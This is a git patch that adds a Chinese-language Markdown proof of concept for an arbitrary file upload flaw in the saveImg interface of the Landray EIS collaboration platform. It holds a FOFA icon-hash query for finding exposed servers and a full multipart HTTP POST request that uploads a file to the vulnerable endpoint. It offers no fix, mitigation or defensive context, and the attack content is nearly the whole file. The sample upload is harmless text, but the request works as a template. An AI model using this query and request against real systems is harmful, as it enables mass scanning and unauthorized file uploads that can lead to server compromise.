From d1616d6d097a46a1c3a58b3c1b174b16a1de8d77 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 21 Oct 2023 10:13:28 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E8=93=9D=E5=87=8CEIS=E6=99=BA?= =?UTF-8?q?=E6=85=A7=E5=8D=8F=E5=90=8C=E5=B9=B3=E5=8F=B0saveImg=E6=8E=A5?= =?UTF-8?q?=E5=8F=A3=E5=AD=98=E5=9C=A8=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6?= =?UTF-8?q?=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...慧协同平台saveImg接口存在任意文件上传漏洞.md | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞.md diff --git a/蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞.md b/蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞.md new file mode 100644 index 0000000..3eda83e --- /dev/null +++ b/蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞.md @@ -0,0 +1,27 @@ + +## 蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞 + +## fofa +``` +icon_hash="953405444" +``` + +## POC +``` +POST /eis/service/api.aspx?action=saveImg HTTP/1.1 +Host: IP:PORT +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 +Content-Length: 197 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu + +------WebKitFormBoundaryxdgaqmqu +Content-Disposition: form-data; name="file"filename="hello.txt" +Content-Type: text/html + +hellohello +------WebKitFormBoundaryxdgaqmqu-- +```